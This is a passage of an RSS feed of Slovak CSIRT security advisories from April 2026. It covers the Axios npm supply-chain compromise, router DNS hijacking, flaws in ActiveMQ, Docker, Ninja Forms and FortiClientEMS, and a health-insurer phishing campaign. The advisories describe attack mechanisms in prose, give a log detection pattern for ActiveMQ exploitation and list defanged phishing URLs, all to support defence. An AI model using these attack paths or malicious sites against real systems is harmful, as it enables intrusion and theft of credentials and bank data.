<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>CSIRT.SK</title>
	<atom:link href="feed" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description></description>
	<lastBuildDate>Fri, 10 Apr 2026 15:12:50 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	
	<item>
		<title>Útok na dodávateľský reťazec cez NPM knižnicu Axios</title>
		<link>/posts/3337</link>
					<comments>/posts/3337#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 10 Apr 2026 15:09:44 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Axios]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[kampaň]]></category>
		<category><![CDATA[NPM]]></category>
		<category><![CDATA[UNC1069]]></category>
		<guid isPermaLink="false">/?p=3337</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/04/axios.png" alt="" /></p>V období od 31. marca do 7. apríla 2026 bol zaznamenaný sofistikovanýútok na dodávateľský reťazec zameraný na populárny npm balík...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/04/axios.png" alt="" /></p>
<p>V období od <strong>31. marca do 7. apríla 2026</strong> bol zaznamenaný sofistikovanýútok na dodávateľský reťazec zameraný na populárny npm balík <strong>Axios</strong>. Útok je pripisovaný severokórejskej skupine <strong>UNC1069</strong>, ktorá kompromitovala účet správcu balíka a publikovala škodlivé verzie knižnice. Útočníci použili verzie 1.14.0 a&nbsp;0.30.3 Axios, v ktorých pridali škodlivú závislosť <em>plain-crypto-js</em> do súboru <em>package.json</em>.</p>



<p>Falošná závislosť po inštalácii automaticky nasadzovala malvér typu <strong>Remote Access Trojan (RAT)</strong>, ktorý umožňoval útočníkom vzdialený prístup k napadnutým systémom a exfiltráciu citlivých údajov.</p>



<p>Napriek krátkemu trvaniu incidentu predstavuje tento útok <strong>vysoké riziko</strong> vzhľadom na masové využitie knižnice Axios.</p>



<p><strong>Časová os útoku</strong></p>



<p><strong>30.3.2026 – Príprava</strong></p>



<p>Do&nbsp;registri NPM bola pridaná knižnica <em>plain-crypto-js@4.2.0</em>, ktorá obsahovala funkcionalitu pre nasadenie malvéru RAT. O&nbsp;niekoľko hodín bola publikovaná jej nová verzia <em>plain-crypto-js@4.2.1</em>. Do knižnice Axios ju pridali ako falošnú závislosť, ktorá imituje legitímnu <em>crypto-js@4.2.0</em>.</p>



<p><strong>31.3.2026 – Začiatok incidentu</strong></p>



<p>Útočníci získali prístup k&nbsp;účtu udržiavateľa <em>jasonsaayman</em> na platforme NPM a publikovali škodlivé verzie knižnice Axios 1.14.1 a 0.30.4. Inštaláciou podvrhnutých verzií došlo k&nbsp;nasadeniu malvéru RAT, funkčného na operačných systémoch macOS, Windows aj Linux. Knižnice boli dostupné na NPM iba niekoľko hodín.</p>



<p><strong>2.4.2026 – Atribúcia</strong></p>



<p>Tím Google Threat Intelligence Group atribuoval útok severekórejskej skupine UNC1069. Skupinu prezradil malvér identifikovaný ako WAVESHAPER.V2, tvoriaci zadné vrátka, ktorý útočníci nasadili s&nbsp;pomocou falošnej závislosti <em>plain-crypto-js</em>. Tiež použili rovnakého poskytovateľa pripojenia ASN a uzol služby AstrillVPN, ktoré v&nbsp;minulosti využil tím UNC1069.</p>



<p><strong>Odporúčania:</strong></p>



<ul>
<li>Bezodkladne vymeňte infikované verzie knižnice Axios (1.14.1 a&nbsp;0.30.4) za bezpečné verzie.</li>



<li>Overte prítomnosť závislosti <em>plain-crypto-js</em> v&nbsp;spojitosti s&nbsp;knižnicou Axios vo vašej infraštruktúre a&nbsp;odstráňte ju z&nbsp;priečinka <em>node_modules</em>. Závislosť <em>plain-crypto-js</em> nie je legitímnou súčasťou žiadnej verzie Axios.</li>



<li>Overte prítomnosť indikátorov kompromitácie vo Vašej infraštruktúre (<a href="https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan">tu</a> a <a href="https://www.endorlabs.com/learn/npm-axios-compromise">tu</a>).</li>



<li>Vykonajte audit svojej CI/CD infraštruktúry.</li>



<li>Pravidlo YARA pre detekciu hrozby nájdete <a href="https://opensourcemalware.com/blog/axios-compromised">tu</a>.</li>
</ul>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan">https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan</a></li>



<li><a href="https://thehackernews.com/2026/03/axios-supply-chain-attack-pushes-cross.html">https://thehackernews.com/2026/03/axios-supply-chain-attack-pushes-cross.html</a></li>



<li><a href="https://opensourcemalware.com/blog/axios-compromised">https://opensourcemalware.com/blog/axios-compromised</a></li>



<li><a href="https://www.endorlabs.com/learn/npm-axios-compromise">https://www.endorlabs.com/learn/npm-axios-compromise</a></li>



<li><a href="https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package">https://cloud.google.com/blog/topics/threat-intelligence/north-korea-threat-actor-targets-axios-npm-package</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3337/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľné smerovače spoločnosti TP-Link môžu umožniť zneužitie DNS a odcudzenie prístupových údajov</title>
		<link>/posts/3335</link>
					<comments>/posts/3335#respond</comments>
		
		<dc:creator><![CDATA[alexander.valach]]></dc:creator>
		<pubDate>Thu, 09 Apr 2026 16:01:38 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[dns hijacking]]></category>
		<category><![CDATA[TP-Link]]></category>
		<guid isPermaLink="false">/?p=3335</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/10/tp-link-1024x691.png" alt="" /></p>Upozorňujeme organizácie, aby preverili, či sa pri vzdialenom prístupe do interných systémov nepoužívajú zraniteľné alebo nepodporované smerovače SOHO. Podľa varovania...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/10/tp-link-1024x691.png" alt="" /></p>
<p>Upozorňujeme organizácie, aby preverili, či sa pri vzdialenom prístupe do interných systémov nepoužívajú zraniteľné alebo nepodporované smerovače SOHO. Podľa varovania FBI a partnerov útočníci zneužívali kompromitované smerovače na zmenu DHCP a DNS nastavení, čím presmerovali DNS dopyty na vlastné prekladače a následne vedeli cielene podvrhnúť odpovede pre vybrané služby. Takto mohli zachytávať prihlasovacie údaje, tokeny a ďalšie citlivé údaje, najmä ak používateľ pokračoval aj po upozornení na chybu certifikátu. Medzi zneužívané zariadenia patrili aj smerovače TP-Link obsahujúce zraniteľnosť <strong>CVE-2023-50224</strong>.</p>



<p>IC3 vo varovaní neuvádza jeden konkrétny model, iba všeobecne „smerovače TP-Link zraniteľné na CVE-2023-50224“. Výrobca TP-Link následne spresnil, že ide o <strong>viaceré staršie modely po ukončení podpory</strong>, pričom medzi explicitne uvádzané patria napríklad <strong>TL-WR841N / TL-WR841ND</strong> a <strong>Archer C7</strong>.&nbsp; V novšom bezpečnostnom oznámení TP-Link sú medzi dotknutými zariadeniami uvedené aj ďalšie zastarané (angl. legacy) modely, napríklad <strong>TL-MR6400, Archer C5, TL-WDR3600, TL-WDR4300, TL-WR740N, TL-WR741ND, TL-WR840N, TL-WR941ND, TL-WA801ND a TL-WA901ND</strong>.</p>



<p><strong>Dopad na Slovensko:</strong></p>



<p>Riziko je relevantné najmä pre organizácie, ktorých zamestnanci pristupujú k e-mailu, VPN alebo interným webovým aplikáciám z domácich alebo malých kancelárskych sietí. Pri tomto type útoku nemusí byť prvým prejavom kompromitácie malvér na stanici, ale zmena sieťových parametrov na okraji siete, preto je dôležité pozerať sa na DNS a DHCP ako na detekčné body.</p>



<p><strong>Odporúčania:</strong></p>



<p>Pokiaľ organizácia používa na vstup do danej siete predsa len modely obsahujúce danú zraniteľnosť, odporúčame z pohľadu bezpečnostného monitoringu sledovať <strong>anomálie v DNS premávke</strong>. Prakticky to znamená overiť, či stanice neposielajú DNS požiadavky na iné IP adresy, než povoľuje politika organizácie (organizácia využíva konkrétne DNS servery), či sa neobjavili nové externé prekladače (angl. resolver), alebo či sa nemení smer DNS komunikácie po pripojení používateľa z domácej siete prostredníctvom daného zariadenia. Tento prístup je primeraný práve preto, že podstatou útoku je práve zmena DNS servera za DNS server útočníka.</p>



<p>Odporúčame tiež cielene preveriť <strong>varovania na certifikáty</strong> pri prihlásení do webmailu, VPN portálov a interných webových aplikácií. IC3 konkrétne uvádza, že podvodné DNS odpovede boli používané aj pre <strong>Microsoft Outlook Web Access</strong> a že útok bol účinný vtedy, keď používateľ pokračoval aj napriek chybnému certifikátu. Preto je potrebné v&nbsp;prípade výskytu zariadenia korelovať výskyt premávky&nbsp;DNS s&nbsp;chybami v rámci certifikátov.</p>



<p>Ak chce organizácia tento problém preveriť rýchlo, mala by začať tromi krokmi:</p>



<ol>
<li>Najprv zistiť, či vzdialení používatelia alebo pobočky nepoužívajú zraniteľné modely TP-Link a iné nepodporované SOHO smerovače.</li>



<li>Potom overiť, aké DNS nastavenia dostávajú klienti cez DHCP.</li>



<li>Skontrolovať v logoch firewallu, DNS alebo EDR, či sa neobjavila komunikácia na neautorizované DNS servery alebo zvýšený výskyt upozornení pri zmene certifikátoch pri prístupe k firemným službám.</li>
</ol>



<p>Ak sa takáto odchýlka potvrdí, je vhodné dotknutý smerovač považovať za kompromitovaný alebo minimálne nedôveryhodný a ďalej preveriť jeho konfiguráciu a&nbsp;incident nahlásiť svojej jednotke CSIRT.</p>



<p><strong>Zdroje:</strong></p>



<p><a href="https://nvd.nist.gov/vuln/detail/cve-2023-50224">https://nvd.nist.gov/vuln/detail/cve-2023-50224</a></p>



<p><a href="https://www.cisa.gov/news-events/alerts/2025/09/03/cisa-adds-two-known-exploited-vulnerabilities-catalog">https://www.cisa.gov/news-events/alerts/2025/09/03/cisa-adds-two-known-exploited-vulnerabilities-catalog</a></p>



<p><a href="https://www.ic3.gov/PSA/2026/PSA260407">https://www.ic3.gov/PSA/2026/PSA260407</a></p>



<p><a href="https://www.tp-link.com/us/support/faq/5058/">https://www.tp-link.com/us/support/faq/5058/</a></p>



<p><a href="https://www.tp-link.com/us/support/faq/4365/">https://www.tp-link.com/us/support/faq/4365/</a></p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3335/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť Apache ActiveMQ Classic umožňuje vykonávanie kódu</title>
		<link>/posts/3332</link>
					<comments>/posts/3332#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 09 Apr 2026 14:16:34 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[ActiveMQ]]></category>
		<category><![CDATA[Apache]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=3332</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/04/Apache_ActiveMQ.png" alt="" /></p>Vývojári opravili vysoko závažnú zraniteľnosť v&#160;open-source serveri Apache ActiveMQ Classic, ktorá umožňuje vzdialené vykonávanie kódu. Chyba sa v&#160;serveri nachádzala 13...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/04/Apache_ActiveMQ.png" alt="" /></p>
<p><strong>Vývojári opravili vysoko závažnú zraniteľnosť v&nbsp;open-source serveri Apache ActiveMQ Classic, ktorá umožňuje vzdialené vykonávanie kódu. Chyba sa v&nbsp;serveri nachádzala 13 rokov.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Apache ActiveMQ / Broker, verzie staršie ako 5.19.4<strong></strong></li>



<li>Apache ActiveMQ / Broker, verzie 6.x.x staršie ako 6.2.3</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2026-34197</strong> (CVSS skóre 8,8)</p>



<p>Populárny server pre message brokering, Apache ActiveMQ Classic, obsahuje 13 rokov starú zraniteľnosť, ktorá po úspešnom zneužití umožňuje vzdialenému útočníkovi s nízkymi oprávneniami vykonávať ľubovoľné príkazy operačného systému.</p>



<p>Chyba vyplýva z neošetrenej kooperácie medzi nezávisle vyvíjanými komponentmi. Rozhranie API komponentu <em>Jolokia</em> je dostupné z webovej manažmentovej konzoly (Jetty web server). To umožňuje v rámci funkcie <em>BrokerService.addNetworkConnector</em> nahrávať konfiguráciu z externých zdrojov. Autentifikovaný útočník môže vďaka tomu vytvoriť špeciálnu požiadavku s využitím parametru <em>brokerConfig</em> protokolu VM a nahrať súbor <em>Spring XML</em>. Vzhľadom na to, že funkcia Spring <em>ResourceXmlApplicationContext</em> iniciuje jeho obsah ešte pred kontrolou konfigurácie, ktorú vykonáva súčasť <em>BrokerService</em>, vzniká priestor kde je možné vykonať ľubovoľný kód.</p>



<p>Verzie Apache ActiveMQ Classic 6.0.0 až 6.1.1 zvyšujú nebezpečenstvo zneužitia, pretože obsahujú zraniteľnosť CVE-2024-32114. Jej zreťazením s CVE-2026-34197 môže útočník obísť potrebu autentifikácie.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Apache ActiveMQ a Apache ActiveMQ Broker aspoň na verziu 5.19.4 alebo 6.2.3.</p>



<p>Pre overenie prítomnosti pokusov o zneužitie zraniteľnosti preverte v broker logu podozrivé spojenia, ktoré využívajú protokol VM (<em>vm://</em>) a dopytový parameter „<em>brokerConfig=xbean:http://</em><strong>“.</strong></p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/">https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/13-year-old-bug-in-activemq-lets-hackers-remotely-execute-commands/">https://www.bleepingcomputer.com/news/security/13-year-old-bug-in-activemq-lets-hackers-remotely-execute-commands/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-34197">https://nvd.nist.gov/vuln/detail/CVE-2026-34197</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3332/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť Docker Engine umožňuje obísť kontrolu autorizácie</title>
		<link>/posts/3329</link>
					<comments>/posts/3329#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 09 Apr 2026 14:13:12 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[AuthZ]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[Docker Engine]]></category>
		<guid isPermaLink="false">/?p=3329</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/04/docker-logo-1024x576.png" alt="" /></p>Vývojári Docker Engine opravili vysoko závažnú zraniteľnosť modulov AuthZ, ktorá dovoľuje útočníkom obchádzať kontroly autorizácie a&#160;vytvárať napríklad privilegované kontajnery. Zraniteľné...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/04/docker-logo-1024x576.png" alt="" /></p>
<p><strong>Vývojári Docker Engine opravili vysoko závažnú zraniteľnosť modulov AuthZ, ktorá dovoľuje útočníkom obchádzať kontroly autorizácie a&nbsp;vytvárať napríklad privilegované kontajnery.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Docker Engine, verzie staršie ako 29.3.1</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2026-34040</strong> (CVSS skóre 8,8)</p>



<p>Vysoko závažná zraniteľnosť Docker Engine umožňuje obchádzať autorizačné moduly AuthZ, ktoré vykonávajú rozhodnutia na základe inšpekcie tela požiadavky API. Chybu zabezpečenia je možné zneužiť zaslaním špeciálne vytvorenej požiadavky s dostatočne veľkým telom (nad 1MB). Middleware AuthZ ju pošle na kontrolu autentifikačnému modulu AuthZ kvôli spôsobu narábania s nadrozmernými požiadavkami bez tela. Ten ju následne povolí, pretože neobsahuje žiaden nepovolený prvok. Celá požiadavka aj s telom následne smeruje z middleware na Docker daemon, ktorý ju prečíta a vykoná.</p>



<p>Útočník tak môže napríklad vytvárať privilegované kontajnery, aj keď je taká možnosť v rámci infraštruktúry zakázaná.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostných prvkov</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Docker Engine aspoň na verziu 29.3.1.</p>



<p>Pokiaľ aktualizácia nie je možná, zraniteľnosť môžete mitigovať obmedzením prístupu k Docker API len z dôveryhodných zdrojov. Môžete tiež prestať používať moduly AuthZ, ktoré rozhodujú na základe inšpekcie tela požiadavky. Ďalšie kontroly a opatrenia vykonajte podľa informácií <a href="https://www.cyera.com/research/one-megabyte-to-root-how-a-size-check-broke-dockers-last-line-of-defense">tu</a>.</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://github.com/moby/moby/security/advisories/GHSA-x744-4wpc-v9h2">https://github.com/moby/moby/security/advisories/GHSA-x744-4wpc-v9h2</a></li>



<li><a href="https://www.cyera.com/research/one-megabyte-to-root-how-a-size-check-broke-dockers-last-line-of-defense">https://www.cyera.com/research/one-megabyte-to-root-how-a-size-check-broke-dockers-last-line-of-defense</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3329/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Phishingová kampaň zameraná na imitovanie webových formulárov VšZP</title>
		<link>/posts/3318</link>
					<comments>/posts/3318#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 09 Apr 2026 08:53:42 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Phishing]]></category>
		<category><![CDATA[vszp]]></category>
		<guid isPermaLink="false">/?p=3318</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/07/168403018_4245645345447723_265570337282777551_n-e1753797910449-1024x657.jpg" alt="" /></p>Internetom sa opakovane šíri phishingová kampaň zameraná na imitovanie webových formulárov VšZP (Všeobecná zdravotná poisťovňa). Podvodníci rozposielajú e-maily s informáciou...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/07/168403018_4245645345447723_265570337282777551_n-e1753797910449-1024x657.jpg" alt="" /></p>
<p>Internetom sa opakovane šíri phishingová kampaň zameraná na imitovanie webových formulárov VšZP (Všeobecná zdravotná poisťovňa). Podvodníci rozposielajú e-maily s informáciou o údajnom vrátení peňazí. Súčasťou správy je aj odkaz vedúci na podvrhnutú stránku, ktorá sa vydáva za web zdravotnej poisťovne.</p>



<p>Podozrivé stránky :&nbsp;</p>



<ul>
<li>hxxps://ralsinternationaltrade[.]com/next</li>



<li>hxxps://qubestores[.]com/uploads/home/pages/step-one[.]php</li>



<li>hxxps://stracetech[.]com/images</li>



<li>hxxps://epobocka-vszp[.]ebnak-kh[.]com/home</li>
</ul>



<p>Vzhľadom na dynamický charakter phishingových kampaní, pri ktorých dochádza k častej zmene podvodných webových stránok, nie je postačujúce orientovať sa výlučne podľa konkrétnych príkladov uvedených vo varovaniach.</p>



<p>Hlavné znaky, na základe ktorých je webová stránka považovaná za podozrivú, zahŕňajú najmä vizuálne spracovanie napodobňujúce dizajn legitímnych služieb VšZP. Stránka sa snaží vzbudiť dôveryhodnosť u&nbsp;používateľa zahrňujúc dôveryhodné farebné prevedenie a&nbsp;odkazy, v&nbsp;spojení s&nbsp;hlásením prostredníctvom mailovej komunikácie.</p>



<p><strong>Venujte preto zvýšenú pozornosť adrese webovej stránky&nbsp;(URL)&nbsp;pred prihlásením sa, či zadaním osobných alebo platobných údajov a pri komunikácii s&nbsp;poisťovňou využívajte výhradne oficiálne kontaktné kanály.&nbsp;</strong></p>



<p>Ak narazíte na podozrivý web, neposkytujte žiadne údaje a nahláste udalosť na&nbsp;<strong>incident@csirt.sk</strong>.</p>



<figure class="wp-block-image size-full"><img fetchpriority="high" decoding="async" width="945" height="379" src="/wp-content/uploads/2026/04/image-6.png" alt="" class="wp-image-3322"/></figure>



<p>Po zadaní požadovaných informácií pre vyplatenie preplatku z&nbsp;poistného Vás web presmeruje na stránku, kde je potrebné zadať bankové údaje, na ktoré bude sľúbený preplatok vyplatený.</p>



<p>Následne web imituje správanie štandardnej platobnej brány, kedy sa pokúša vytvoriť spojenie s&nbsp;bankovým subjektom, ako aj overenie pomocou „druhého faktora“.</p>



<figure class="wp-block-image size-full"><img decoding="async" width="944" height="378" src="/wp-content/uploads/2026/04/image-4.png" alt="" class="wp-image-3320"/></figure>



<figure class="wp-block-image size-full"><img decoding="async" width="942" height="378" src="/wp-content/uploads/2026/04/image-5.png" alt="" class="wp-image-3321"/></figure>



<p>Po „overení“ bankového spojenia web požaduje ešte zadanie dodatočného bezpečnostného faktora.</p>



<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="945" height="378" src="/wp-content/uploads/2026/04/image-3.png" alt="" class="wp-image-3319"/></figure>



<p><strong></strong><strong>Ďalšie (neaktívne) weby</strong></p>



<p>Nižšie prikladáme zoznam ďalších webov, ktoré obsahovali rovnaký phishingový obsah, avšak už sú neaktívne:</p>



<p>hxxp://vszp-obnova[.]com/</p>



<p>hxxp://infosk-vszp[.]com/</p>



<p>hxxps://vakafetzi[.]sites[.]sch[.]gr/wordpress/wp/slovakia/index.php</p>



<p>hxxp://mkto-ab690062[.]com/NDQyLVhMQy0zMjAAAAGdz_iBE9FzyYkLWqndch2du4m_AURIUhaqBUeQk75dg4nItKVJN5_OuR0yEVSS_AkXq6N79cQ=</p>



<p>hxxp://mkto-ab690062[.]com/NDQyLVhMQy0zMjAAAAGdz_iBE7c7MfUCI1wuZDtROWuh70uV6sRtK2Zo1TLn2pQqFYr5w83cvs0OZ5x7d1twW7HkG3M=</p>



<p>hxxp://mkto-ab690062[.]com/NDQyLVhMQy0zMjAAAAGdz_iBE37piY4CqW4MeryeKyFxV1WmjrHFWjFQNg05IVkyhYQbEgsmvyHaz3teMsG_rPl1J2E=</p>



<p>hxxp://mkto-ab690062[.]com/NDQyLVhMQy0zMjAAAAGdz_iBE_rrzmIXDMqWJBOAVsXgUgzCZGuZJnnirEXe2iGpZFoY1XMahkBxegT2Iy3LbDWSUys=</p>



<p>hxxps://www[.]faduae[.]com/vs-mext</p>



<p>hxxps://canaldirecto[.]com/next</p>



<p>hxxps://chaingapp[.]com/coredeux/</p>



<p>hxxps://uk5aside[.]com/web/home/pages/step-one.php</p>



<p>hxxps://kvn.reality[.]com/app1/pages/step-one.php</p>



<p>hxxps://canaldirecto[.]com/beta</p>



<p>hxxps://cassardi[.]com/app-login/pages/step-one.php</p>



<p>hxxps://mefaticaret[.]com/cookie</p>



<p>hxxps://madenacarspareparts[.]com/plugins/home/pages/step-one.php</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3318/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná kritická zraniteľnosť modulu WordPress Ninja Forms &#8211; File Uploads</title>
		<link>/posts/3324</link>
					<comments>/posts/3324#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 08 Apr 2026 14:48:24 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Ninja Forms]]></category>
		<category><![CDATA[Ninja Forms - File Uploads]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[wordpress]]></category>
		<guid isPermaLink="false">/?p=3324</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2026/04/Ninja_forms_file_uploads-1024x689.png" alt="" /></p>Vývojári populárneho modulu pre WordPress, Ninja Forms &#8211; File Uploads, vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú aktívne zneužívanú kritickú...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2026/04/Ninja_forms_file_uploads-1024x689.png" alt="" /></p>
<p><strong>Vývojári populárneho modulu pre WordPress, Ninja Forms &#8211; File Uploads, vydali bezpečnostné aktualizácie svojho produktu, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť. &nbsp;Jej zneužitie umožňuje nahrávanie ľubovoľných súborov na server.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Ninja Forms &#8211; File Uploads vo verziách 3.3.26 a starších</li>
</ul>



<p><strong>Opis zraniteľností:</strong></p>



<p><strong>CVE-2026-0740 </strong>(CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť modulu Ninja Forms &#8211; File Uploads pre WordPress spočíva v absencii overovania súborových typov a prípon cieľových názvov súborov vo funkcii <em>NF_FU_AJAX_Controllers_Uploads::handle_upload</em>. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na nahratie ľubovoľných súborov na webserver. Funkcia neoveruje v&nbsp;rámci názvov súborov ani súborové cesty, teda útočník dokáže nahrať súbor aj do iného priečinku, ako na to určeného. To umožňuje napríklad nahrať PHP skripty do koreňového priečinku a&nbsp;vykonávať ich.</p>



<p>Predmetná zraniteľnosť je aktívne zneužívaná.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonávanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia modulu Ninja Forms &#8211; File Uploads aspoň na verziu 3.3.27. Odporúčame tiež vykonať kontrolu integrity súborového systému webstránky.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ninja-forms-uploads/ninja-forms-file-upload-3326-unauthenticated-arbitrary-file-upload">https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ninja-forms-uploads/ninja-forms-file-upload-3326-unauthenticated-arbitrary-file-upload</a></li>



<li><a href="https://www.wordfence.com/blog/2026/04/50000-wordpress-sites-affected-by-arbitrary-file-upload-vulnerability-in-ninja-forms-file-upload-wordpress-plugin/">https://www.wordfence.com/blog/2026/04/50000-wordpress-sites-affected-by-arbitrary-file-upload-vulnerability-in-ninja-forms-file-upload-wordpress-plugin/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2026-0740">https://nvd.nist.gov/vuln/detail/CVE-2026-0740</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/3324/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Fortinet opravila zneužívanú kritickú zraniteľnosť FortiClientEMS</title>
		<link>/posts/3306</link>
					<comments>/posts/3306#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 07 Apr 2026 08:29:35 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<category><![CDATA[FortiClient]]></category>
		<category><![CDATA[Fortinet]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=3306</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>Spoločnosť Fortinet opravila kritickú aktívne zneužívanú zraniteľnosť svojho produktu FortiClientEMS, ktorá umožňuje obísť autentifikáciu a&#160;vzdialene vykonávať kód. Zraniteľné systémy: Opis...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/10/Fortinet-Logo.wine_-1024x683.png" alt="" /></p>
<p><strong>Spoločnosť Fortinet opravila kritickú aktívne zneužívanú zraniteľnosť svojho produktu FortiClientEMS, ktorá umožňuje obísť autentifikáciu a&nbsp;vzdialene vykonávať kód.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>FortiClientEMS 7.4.5 &#8211; 7.4.6</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2026-35616</strong> (CVSS skóre 9,8)</p>



<p>Kritická zraniteľnosť FortiClientEMS súvisí s nedostatočnou kontrolou prístupov. Vzdialený neautentifikovaný útočník ju môže zneužiť na obídenie API autentifikácie a vykonanie kódu alebo príkazov pomocou špeciálne vytvorených požiadaviek.</p>



<p>Spoločnosť Fortinet sa vyjadrila, že zraniteľnosť je aktívne zneužívaná. Americká agentúra CISA ju zaradila do svojho katalógu zneužívaných zraniteľností KEV.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Obídenie bezpečnostných prvkov</strong></li>



<li><strong></strong><strong>Vzdialené vykonávanie kódu</strong></li>
